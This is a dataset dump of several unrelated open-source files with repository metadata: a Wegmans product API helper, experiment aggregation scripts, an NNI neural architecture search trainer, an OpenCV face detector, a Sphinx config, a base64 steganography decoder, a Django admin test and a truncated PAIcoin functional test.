"MIT"
] | 2 | 2020-02-26T16:43:07.000Z | 2021-03-19T20:03:58.000Z | thewegmenu/utils/wegmans_utils.py | jzaia18/TheWegMenu | 2cef89bc9b881be37c2a54c1ff4ac52ee4c4b530 | [
"MIT"
] | null | null | null | thewegmenu/utils/wegmans_utils.py | jzaia18/TheWegMenu | 2cef89bc9b881be37c2a54c1ff4ac52ee4c4b530 | [
"MIT"
] | 1 | 2021-06-19T03:43:04.000Z | 2021-06-19T03:43:04.000Z | import requests, os, json, sys
MAX_RESULTS = 1
DIR = os.path.dirname(__file__) or '.'
KEY = json.loads(open(DIR + "/../secrets.JSON").read())['wegmans']
headers = {
'Cache-Control': 'no-cache',
"Subscription-Key": KEY,
}
params = {
"api-version": "2018-10-18",
}
def get_skus(food):
query = {
"query": food,
"results": MAX_RESULTS,
**params,
}
resp = requests.get("https://api.wegmans.io/products/search/", headers=headers, params=query)
if resp.status_code != 200:
return None
return [food['sku'] for food in json.loads(resp.content)['results']]
def get_food_data_by_sku(sku):
resp = requests.get("https://api.wegmans.io/products/" + str(sku), headers=headers, params=params)
if resp.status_code != 200:
return None
return json.loads(resp.content)
def get_food_data(food):
skus = get_skus(food)
if not skus:
return None
return list(filter(lambda x: x, [get_food_data_by_sku(sku) for sku in skus]))
if __name__ == '__main__':
# if len(sys.argv) < 2:
# print("Please input a food")
# exit()
# for item in get_food_data(sys.argv[1]):
# print(item['name'])
# print("\n")
#for item in get_food_data("vegan butter"):
# print(item)
print(get_food_data_by_sku(11914))
| 24.62963 | 102 | 0.615038 |
7946378dbb436e566d105fa17001f7a17515f8b4 | 11,103 | py | Python | experiments/2020-11-11-chg-sig/analysis/aggMaxFitChgEnv.py | mmore500/Tag-based-Genetic-Regulation-for-LinearGP | eda84198123cce32d8282d6920bf80b48d74c248 | [
"MIT"
] | 1 | 2021-09-17T13:17:07.000Z | 2021-09-17T13:17:07.000Z | experiments/2020-11-11-chg-sig/analysis/aggMaxFitChgEnv.py | mmore500/Tag-based-Genetic-Regulation-for-LinearGP | eda84198123cce32d8282d6920bf80b48d74c248 | [
"MIT"
] | 1 | 2020-11-09T16:52:34.000Z | 2020-12-11T02:32:40.000Z | experiments/2020-11-11-chg-sig/analysis/aggMaxFitChgEnv.py | mmore500/Tag-based-Genetic-Regulation-for-LinearGP | eda84198123cce32d8282d6920bf80b48d74c248 | [
"MIT"
] | 2 | 2021-08-11T00:08:01.000Z | 2021-08-12T18:14:45.000Z | '''
This is a utility script for aggregating data (on MSU's HPCC) for this experiment.
WARNING: this script might not age well (makes assumptions about file systems, etc)!
For each run, grab the maximum fitness organism at end of run.
'''
import argparse, os, copy, errno, csv, re, sys
import hjson,json
csv.field_size_limit(sys.maxsize)
key_settings = [
"SEED",
"matchbin_metric",
"matchbin_thresh",
"matchbin_regulator",
"TAG_LEN",
"NUM_ENV_STATES",
"NUM_ENV_UPDATES",
"USE_FUNC_REGULATION",
"USE_GLOBAL_MEMORY",
"MUT_RATE__INST_ARG_SUB",
"MUT_RATE__INST_SUB",
"MUT_RATE__INST_INS",
"MUT_RATE__INST_DEL",
"MUT_RATE__SEQ_SLIP",
"MUT_RATE__FUNC_DUP",
"MUT_RATE__FUNC_DEL",
"MUT_RATE__INST_TAG_BF",
"MUT_RATE__FUNC_TAG_BF",
"CPU_CYCLES_PER_ENV_UPDATE",
"MAX_FUNC_CNT",
"MAX_FUNC_INST_CNT",
"MAX_ACTIVE_THREAD_CNT",
"MAX_THREAD_CAPACITY",
"TOURNAMENT_SIZE",
"INST_MIN_ARG_VAL",
"INST_MAX_ARG_VAL"
]
"""
This is functionally equivalent to the mkdir -p [fname] bash command
"""
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
"""
Given the path to a run's config file, extract the run's settings.
"""
def extract_settings(run_config_path):
content = None
with open(run_config_path, "r") as fp:
content = fp.read().strip().split("\n")
header = content[0].split(",")
header_lu = {header[i].strip():i for i in range(0, len(header))}
content = content[1:]
configs = [l for l in csv.reader(content, quotechar='"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)]
return {param[header_lu["parameter"]]:param[header_lu["value"]] for param in configs}
def find_org_analysis_path(run_path, update):
output_path = os.path.join(run_path, "output")
# Find all org analysis files (analysis_org_0_update_1000.csv)
analysis_files = [fname for fname in os.listdir(output_path) if "analysis_org_" in fname]
def max_key(s):
u = int(s.split("_update_")[-1].split(".")[0])
if update == None:
return u
else:
return u if u <= update else -1
return os.path.join(output_path, max(analysis_files, key=max_key))
def find_trace_path(run_path, update):
output_path = os.path.join(run_path, "output")
trace_files = [fname for fname in os.listdir(output_path) if "trace_org_" in fname]
def max_key(s):
u = int(s.split("_update_")[-1].split(".")[0])
if update == None:
return u
else:
return u if u <= update else -1
return os.path.join(output_path, max(trace_files, key=max_key))
"""
Aggregate!
"""
def main():
# Setup the commandline argument parser
parser = argparse.ArgumentParser(description="Data aggregation script.")
parser.add_argument("--data", type=str, nargs="+", help="Where should we pull data (one or more locations)?")
parser.add_argument("--dump", type=str, help="Where to dump this?", default=".")
parser.add_argument("--update", type=int, default=-1, help="What is the maximum update we should pull organisms from?")
parser.add_argument("--out_fname", type=str, help="What should we call the output file?", default="max_fit_orgs.csv")
# Extract arguments from commandline
args = parser.parse_args()
data_dirs = args.data
dump_dir = args.dump
dump_fname = args.out_fname
update = args.update
# Are all data directories for real?
if any([not os.path.exists(loc) for loc in data_dirs]):
print("Unable to locate all data directories. Able to locate:", {loc: os.path.exists(loc) for loc in data_dirs})
exit(-1)
mkdir_p(dump_dir)
# Aggregate a list of all runs
run_dirs = [os.path.join(data_dir, run_dir) for data_dir in data_dirs for run_dir in os.listdir(data_dir) if "RUN_" in run_dir]
# sort run directories by seed to make easier on the eyes
run_dirs.sort(key=lambda x : int(x.split("_")[-1]))
print(f"Found {len(run_dirs)} run directories.")
analysis_header_set = set() # Use this to guarantee all organism file headers match.
# For each run, aggregate max fitness organism information.
analysis_org_infos = []
for run in run_dirs:
print(f"Extracting information from {run}")
run_config_path = os.path.join(run, "output", "run_config.csv")
# these find functions will crash
org_analysis_path = find_org_analysis_path(run, update if update >= 0 else None)
org_trace_path = find_trace_path(run, update if update >= 0 else None)
max_fit_path = os.path.join(run, "output", "max_fit_org.csv")
if not os.path.exists(run_config_path):
print(f"Failed to find run parameters ({run_config_path})")
exit(-1)
# double check that analysis and trace files are from the same update and org ID
analysis_update = org_analysis_path.split("/")[-1].split("_update_")[-1].split(".")[0]
trace_update = org_trace_path.split("/")[-1].split("_update_")[-1].split(".")[0]
if analysis_update != trace_update:
print(f"Analysis file and trace file updates do not match: \n * {analysis_update}\n * {trace_update}\n")
exit(-1)
analysis_id = org_analysis_path.split("/")[-1].split("org_")[-1].split("_")[0]
trace_id = org_trace_path.split("/")[-1].split("org_")[-1].split("_")[0]
if analysis_id != trace_id:
print(f"Analysis file and trace file updates do not match: \n * {analysis_id}\n * {trace_id}\n")
exit(-1)
# extract run settings
run_settings = extract_settings(run_config_path)
# ========= extract analysis file info =========
content = None
with open(max_fit_path, "r") as fp:
content = fp.read().strip().split("\n")
max_fit_header = content[0].split(",")
max_fit_header_lu = {max_fit_header[i].strip():i for i in range(0, len(max_fit_header))}
content = content[1:]
orgs = [l for l in csv.reader(content, quotechar='"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)]
max_fit_org = orgs[-1]
max_fit_id = max_fit_org[max_fit_header_lu["pop_id"]]
if max_fit_id != analysis_id:
print("Max fit id: ", max_fit_id)
print("Analysis id: ", analysis_id)
print("Something's gone WRONG!")
exit(-1)
# Fields to collect from max fit file.
max_fit_vals = {
"update": max_fit_org[max_fit_header_lu["update"]],
"solution": max_fit_org[max_fit_header_lu["solution"]],
"score": max_fit_org[max_fit_header_lu["score"]],
"num_matches": max_fit_org[max_fit_header_lu["num_matches"]],
"num_misses": max_fit_org[max_fit_header_lu["num_misses"]],
"num_no_responses": max_fit_org[max_fit_header_lu["num_no_responses"]]
}
max_fit_fields = ["update","solution","score","num_matches","num_misses","num_no_responses"]
# ========= extract analysis file info =========
content = None
with open(org_analysis_path, "r") as fp:
content = fp.read().strip().split("\n")
analysis_header = content[0].split(",")
analysis_header_lu = {analysis_header[i].strip():i for i in range(0, len(analysis_header))}
content = content[1:]
analysis_orgs = [l for l in csv.reader(content, quotechar='"', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)]
num_analyses = len(analysis_orgs)
num_analysis_solutions = 0
num_analysis_solutions_ko_reg = 0
num_analysis_solutions_ko_mem = 0
num_analysis_solutions_ko_all = 0
solution_score = float(run_settings["NUM_ENV_UPDATES"])
all_solution = True
all_solution_ko_reg = True
all_solution_ko_mem = True
all_solution_ko_all = True
for analysis_org in analysis_orgs:
org_info = { analysis_header[i]:analysis_org[i] for i in range(0, len(analysis_org)) }
base_score = float(org_info["score"])
ko_reg_score = float(org_info["score_ko_regulation"])
ko_mem_score = float(org_info["score_ko_global_memory"])
ko_all_score = float(org_info["score_ko_all"])
is_sol = base_score >= solution_score
ko_reg_is_sol = ko_reg_score >= solution_score
ko_mem_is_sol = ko_mem_score >= solution_score
ko_all_is_sol = ko_all_score >= solution_score
if (is_sol):
num_analysis_solutions += 1
else:
all_solution = False
if (ko_reg_is_sol):
num_analysis_solutions_ko_reg += 1
else:
all_solution_ko_reg = False
if (ko_mem_is_sol):
num_analysis_solutions_ko_mem += 1
else:
all_solution_ko_mem = False
if (ko_all_is_sol):
num_analysis_solutions_ko_all += 1
else:
all_solution_ko_all = False
# end analysis file for loop
analysis_vals = {
"num_analyses": num_analyses,
"num_analysis_solutions": num_analysis_solutions,
"num_analysis_solutions_ko_reg": num_analysis_solutions_ko_reg,
"num_analysis_solutions_ko_mem": num_analysis_solutions_ko_mem,
"num_analysis_solutions_ko_all": num_analysis_solutions_ko_all,
"all_solution": int(all_solution),
"all_solution_ko_reg": int(all_solution_ko_reg),
"all_solution_ko_mem": int(all_solution_ko_mem),
"all_solution_ko_all": int(all_solution_ko_all)
}
analysis_fields=["num_analyses","num_analysis_solutions","num_analysis_solutions_ko_reg","num_analysis_solutions_ko_mem","num_analysis_solutions_ko_all","all_solution","all_solution_ko_reg","all_solution_ko_mem","all_solution_ko_all"]
analysis_header_set.add(",".join([key for key in key_settings] + max_fit_fields + analysis_fields))
if len(analysis_header_set) > 1:
print(f"Header mismatch! ({org_analysis_path})")
exit(-1)
# # surround things in quotes that need it
# org[analysis_header_lu["program"]] = "\"" + org[analysis_header_lu["program"]] + "\""
analysis_org_infos.append([run_settings[key] for key in key_settings] + [max_fit_vals[field] for field in max_fit_fields] + [analysis_vals[field] for field in analysis_fields])
# Output analysis org infos
out_content = list(analysis_header_set)[0] + "\n" # Should be guaranteed to be length 1!
out_content += "\n".join([",".join(map(str, line)) for line in analysis_org_infos])
with open(os.path.join(dump_dir, dump_fname), "w") as fp:
fp.write(out_content)
print(f"Done! Output written to {os.path.join(dump_dir, dump_fname)}")
if __name__ == "__main__":
main() | 43.541176 | 242 | 0.646942 |
794639c68dcadd609799a0180bdea577c3ada072 | 7,471 | py | Python | nni/retiarii/oneshot/pytorch/random.py | ggzhang0071/nni | f4145e62d89c3ca383cf00f2de5dfd2d1025ad92 | [
"MIT"
] | 9,680 | 2019-05-07T01:42:30.000Z | 2022-03-31T16:48:33.000Z | nni/retiarii/oneshot/pytorch/random.py | soma2000-lang/nni | eaad98528c7aa714c9848800d607d6aa3bdd531d | [
"MIT"
] | 1,957 | 2019-05-06T21:44:21.000Z | 2022-03-31T09:21:53.000Z | nni/retiarii/oneshot/pytorch/random.py | soma2000-lang/nni | eaad98528c7aa714c9848800d607d6aa3bdd531d | [
"MIT"
] | 1,571 | 2019-05-07T06:42:55.000Z | 2022-03-31T03:19:24.000Z | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import logging
import random
import torch
import torch.nn as nn
from ..interface import BaseOneShotTrainer
from .utils import AverageMeterGroup, replace_layer_choice, replace_input_choice, to_device
_logger = logging.getLogger(__name__)
def _get_mask(sampled, total):
multihot = [i == sampled or (isinstance(sampled, list) and i in sampled) for i in range(total)]
return torch.tensor(multihot, dtype=torch.bool) # pylint: disable=not-callable
class PathSamplingLayerChoice(nn.Module):
"""
Mixed module, in which fprop is decided by exactly one or multiple (sampled) module.
If multiple module is selected, the result will be sumed and returned.
Attributes
----------
sampled : int or list of int
Sampled module indices.
mask : tensor
A multi-hot bool 1D-tensor representing the sampled mask.
"""
def __init__(self, layer_choice):
super(PathSamplingLayerChoice, self).__init__()
self.op_names = []
for name, module in layer_choice.named_children():
self.add_module(name, module)
self.op_names.append(name)
assert self.op_names, 'There has to be at least one op to choose from.'
self.sampled = None # sampled can be either a list of indices or an index
def forward(self, *args, **kwargs):
assert self.sampled is not None, 'At least one path needs to be sampled before fprop.'
if isinstance(self.sampled, list):
return sum([getattr(self, self.op_names[i])(*args, **kwargs) for i in self.sampled]) # pylint: disable=not-an-iterable
else:
return getattr(self, self.op_names[self.sampled])(*args, **kwargs) # pylint: disable=invalid-sequence-index
def __len__(self):
return len(self.op_names)
@property
def mask(self):
return _get_mask(self.sampled, len(self))
class PathSamplingInputChoice(nn.Module):
"""
Mixed input. Take a list of tensor as input, select some of them and return the sum.
Attributes
----------
sampled : int or list of int
Sampled module indices.
mask : tensor
A multi-hot bool 1D-tensor representing the sampled mask.
"""
def __init__(self, input_choice):
super(PathSamplingInputChoice, self).__init__()
self.n_candidates = input_choice.n_candidates
self.n_chosen = input_choice.n_chosen
self.sampled = None
def forward(self, input_tensors):
if isinstance(self.sampled, list):
return sum([input_tensors[t] for t in self.sampled]) # pylint: disable=not-an-iterable
else:
return input_tensors[self.sampled]
def __len__(self):
return self.n_candidates
@property
def mask(self):
return _get_mask(self.sampled, len(self))
class SinglePathTrainer(BaseOneShotTrainer):
"""
Single-path trainer. Samples a path every time and backpropagates on that path.
Parameters
----------
model : nn.Module
Model with mutables.
loss : callable
Called with logits and targets. Returns a loss tensor.
metrics : callable
Returns a dict that maps metrics keys to metrics data.
optimizer : Optimizer
Optimizer that optimizes the model.
num_epochs : int
Number of epochs of training.
dataset_train : Dataset
Dataset of training.
dataset_valid : Dataset
Dataset of validation.
batch_size : int
Batch size.
workers: int
Number of threads for data preprocessing. Not used for this trainer. Maybe removed in future.
device : torch.device
Device object. Either ``torch.device("cuda")`` or ``torch.device("cpu")``. When ``None``, trainer will
automatic detects GPU and selects GPU first.
log_frequency : int
Number of mini-batches to log metrics.
"""
def __init__(self, model, loss, metrics,
optimizer, num_epochs, dataset_train, dataset_valid,
batch_size=64, workers=4, device=None, log_frequency=None):
self.model = model
self.loss = loss
self.metrics = metrics
self.optimizer = optimizer
self.num_epochs = num_epochs
self.dataset_train = dataset_train
self.dataset_valid = dataset_valid
self.batch_size = batch_size
self.workers = workers
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device is None else device
self.log_frequency = log_frequency
self.model.to(self.device)
self.nas_modules = []
replace_layer_choice(self.model, PathSamplingLayerChoice, self.nas_modules)
replace_input_choice(self.model, PathSamplingInputChoice, self.nas_modules)
for _, module in self.nas_modules:
module.to(self.device)
self.train_loader = torch.utils.data.DataLoader(self.dataset_train,
batch_size=batch_size,
num_workers=workers)
self.valid_loader = torch.utils.data.DataLoader(self.dataset_valid,
batch_size=batch_size,
num_workers=workers)
def _resample(self):
result = {}
for name, module in self.nas_modules:
if name not in result:
result[name] = random.randint(0, len(module) - 1)
module.sampled = result[name]
return result
def _train_one_epoch(self, epoch):
self.model.train()
meters = AverageMeterGroup()
for step, (x, y) in enumerate(self.train_loader):
x, y = to_device(x, self.device), to_device(y, self.device)
self.optimizer.zero_grad()
self._resample()
logits = self.model(x)
loss = self.loss(logits, y)
loss.backward()
self.optimizer.step()
metrics = self.metrics(logits, y)
metrics["loss"] = loss.item()
meters.update(metrics)
if self.log_frequency is not None and step % self.log_frequency == 0:
_logger.info("Epoch [%s/%s] Step [%s/%s] %s", epoch + 1,
self.num_epochs, step + 1, len(self.train_loader), meters)
def _validate_one_epoch(self, epoch):
self.model.eval()
meters = AverageMeterGroup()
with torch.no_grad():
for step, (x, y) in enumerate(self.valid_loader):
x, y = to_device(x, self.device), to_device(y, self.device)
self._resample()
logits = self.model(x)
loss = self.loss(logits, y)
metrics = self.metrics(logits, y)
metrics["loss"] = loss.item()
meters.update(metrics)
if self.log_frequency is not None and step % self.log_frequency == 0:
_logger.info("Epoch [%s/%s] Validation Step [%s/%s] %s", epoch + 1,
self.num_epochs, step + 1, len(self.valid_loader), meters)
def fit(self):
for i in range(self.num_epochs):
self._train_one_epoch(i)
self._validate_one_epoch(i)
def export(self):
return self._resample()
RandomTrainer = SinglePathTrainer
| 36.622549 | 131 | 0.614376 |
79463aa6179ea893e72e58e04173fa5dca696507 | 536 | py | Python | ex15_face.py | Yasir323/Image-Processing | 1301492444182ee89eb20f37571e2f18b58de8eb | [
"MIT"
] | null | null | null | ex15_face.py | Yasir323/Image-Processing | 1301492444182ee89eb20f37571e2f18b58de8eb | [
"MIT"
] | null | null | null | ex15_face.py | Yasir323/Image-Processing | 1301492444182ee89eb20f37571e2f18b58de8eb | [
"MIT"
] | null | null | null | import cv2
face_cascade = cv2.CascadeClassifier('data/haarcascade_frontalface_default.xml')
img = cv2.imread('data/melissa.jpg')
new_width = 320
scale_factor = new_width / img.shape[1]
new_height = scale_factor * img.shape[0]
new_shape = (new_width, int(new_height))
img = cv2.resize(img, new_shape)
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(img_gray, 1.3, 5)
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x+w, y+h), (255, 255, 255), 2)
cv2.imshow('Result', img)
cv2.waitKey(0)
| 31.529412 | 80 | 0.727612 |
79463ac174641f0eab4745a982f77d383c42f94b | 7,916 | py | Python | docs/conf.py | vijethmoudgalya/admissiondvc | 3bd0f3e580890d0915222169da7754f49c5e75e7 | [
"MIT"
] | null | null | null | docs/conf.py | vijethmoudgalya/admissiondvc | 3bd0f3e580890d0915222169da7754f49c5e75e7 | [
"MIT"
] | null | null | null | docs/conf.py | vijethmoudgalya/admissiondvc | 3bd0f3e580890d0915222169da7754f49c5e75e7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# wineqdvc documentation build configuration file, created by
# sphinx-quickstart.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'wineqdvc'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'simple_mlopsappdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index',
'simple_mlopsapp.tex',
u'wineqdvc Documentation',
u"Your name (or your organization/company/team)", 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'simple_mlopsapp', u'wineqdvc Documentation',
[u"Your name (or your organization/company/team)"], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'simple_mlopsapp', u'wineqdvc Documentation',
u"Your name (or your organization/company/team)", 'wineqdvc',
'mlops implementataion of wine quality predicition using dvc', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
| 32.310204 | 85 | 0.709197 |
79463cd47a9c84d7a471016812bdf6cbf5e7e76b | 1,537 | py | Python | base64stego.py | itungsten/miscScripts | c43378247525a2b8a48b906b3a19cf9847e4c845 | [
"MIT"
] | null | null | null | base64stego.py | itungsten/miscScripts | c43378247525a2b8a48b906b3a19cf9847e4c845 | [
"MIT"
] | null | null | null | base64stego.py | itungsten/miscScripts | c43378247525a2b8a48b906b3a19cf9847e4c845 | [
"MIT"
] | null | null | null | # stego.txt为待解密的base64隐写字符串所在的文件
# 一行一个base64编码,其中任意一行可以无隐藏数据
f = open('stego.txt','r')
import re
import base64
b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
base64str = f.readline()
# pattern2用于匹配两个等号情况时,等号前的一个字符
# pattern2用于匹配一个等号情况时,等号前的一个字符
pattern2 = r'(\S)==$'
pattern1 = r'(\S)=$'
# 提取后的隐写二进制字符加入binstring中
binstring = ''
# 逐行读取待解密的base64隐写字符串,逐行处理
while(base64str):
# 先匹配两个等号的情况,如果匹配不上,再配置一个等号的情况
# 如果无等号,则没有隐藏,无需处理
if re.compile(pattern2).findall(base64str):
# mstr为等号前的一个字符,该字符为隐写二进制信息所在的字符
mstr = re.compile(pattern2).findall(base64str)[0]
# 确认mstr字符对应的base64二进制数,赋值给mbin
mbin = bin(b64chars.find(mstr))
# mbin格式如0b100,mbin[0:2]为0b
# mbin[2:].zfill(6)为将0b后面的二进制数前面补0,使0b后面的长度为6
mbin2 = mbin[0:2] + mbin[2:].zfill(6)
# 两个等号情况隐写了4位二进制数,所以提取mbin2的后4bit
# 赋值给stegobin,这就是隐藏的二进制信息
stegobin = mbin2[-4:]
binstring += stegobin
elif re.compile(pattern1).findall(base64str):
mstr = re.compile(pattern1).findall(base64str)[0]
mbin = bin(b64chars.find(mstr))
mbin2 = mbin[0:2] + mbin[2:].zfill(6)
# 一个等号情况隐写了2位二进制数,所以提取mbin2的后2bit
stegobin = mbin2[-2:]
binstring += stegobin
base64str = f.readline()
# stegobin将各行隐藏的二进制字符拼接在一起
# 从第0位开始,8bit、8bit处理,所以range的步进为8
for i in range(0,len(binstring),8):
# int(xxx,2),将二进制字符串转换为10进制的整数,再用chr()转为字符
print(chr(int(binstring[i:i+8],2)),end='') | 30.137255 | 78 | 0.657124 |
79463d3216ad735052a2a9548776c6c03cfcf02e | 1,343 | py | Python | app/core/tests/test_admin.py | underdog418/django-recipe | 4007d016deaac003c11e4ab2c44aa4c78347deac | [
"MIT"
] | null | null | null | app/core/tests/test_admin.py | underdog418/django-recipe | 4007d016deaac003c11e4ab2c44aa4c78347deac | [
"MIT"
] | null | null | null | app/core/tests/test_admin.py | underdog418/django-recipe | 4007d016deaac003c11e4ab2c44aa4c78347deac | [
"MIT"
] | null | null | null | from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email='[email protected]',
password='password123'
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email='[email protected]',
password='password123',
name='Test user full name'
)
def test_users_listed(self):
"""Test that users are listed on user page"""
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_change_page(self):
"""test theat the user edit page works"""
url = reverse('admin:core_user_change', args=[self.user.id])
# /admin/core/user/1
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
"""Test that the create user page works"""
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| 31.232558 | 68 | 0.635145 |
79463ffcf1da22067bf9a2305f9c5c7001bec16b | 8,351 | py | Python | test/functional/assumevalid.py | paicoin/paicoin | 09f8029112e7a57548ee5b5202c260f8aee7f2e9 | [
"MIT"
] | 77 | 2018-07-04T14:03:42.000Z | 2021-12-19T17:11:14.000Z | test/functional/assumevalid.py | paicoin/paicoin | 09f8029112e7a57548ee5b5202c260f8aee7f2e9 | [
"MIT"
] | 89 | 2018-06-20T03:48:55.000Z | 2022-02-10T06:50:56.000Z | test/functional/assumevalid.py | paicoin/paicoin | 09f8029112e7a57548ee5b5202c260f8aee7f2e9 | [
"MIT"
] | 40 | 2018-06-15T12:59:35.000Z | 2021-12-12T15:49:56.000Z | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test logic for skipping signature validation on old blocks.
Test logic for skipping signature validation on blocks which we've assumed
valid (https://github.com/bitcoin/bitcoin/pull/9484)
We build a chain that includes and invalid signature for one of the
transactions:
0: genesis block
1: block 1 with coinbase transaction output.
2-101: bury that block with 100 blocks so the coinbase transaction
output can be spent
102: a block containing a transaction spending the coinbase
transaction output. The transaction has an invalid signature.
103-2202: bury the bad block with just over two weeks' worth of blocks
(2100 blocks)
Start three nodes:
- node0 has no -assumevalid parameter. Try to sync to block 2202. It will
reject block 102 and only sync as far as block 101
- node1 has -assumevalid set to the hash of block 102. Try to sync to
block 2202. node1 will sync all the way to block 2202.
- node2 has -assumevalid set to the hash of block 102. Try to sync to
block 200. node2 will reject block 102 since it's assumed valid, but it
isn't buried by at least two weeks' work.
"""
import time
from test_framework.blocktools import (create_block, create_coinbase)
from test_framework.key import CECKey
from test_framework.mininode import (CBlockHeader,
COutPoint,
CTransaction,
CTxIn,
CTxOut,
NetworkThread,
NodeConn,
NodeConnCB,
msg_block,
msg_headers)
from test_framework.script import (CScript, OP_TRUE)
from test_framework.test_framework import PAIcoinTestFramework
from test_framework.util import (p2p_port, assert_equal)
class BaseNode(NodeConnCB):
def send_header_for_blocks(self, new_blocks):
headers_message = msg_headers()
headers_message.headers = [CBlockHeader(b) for b in new_blocks]
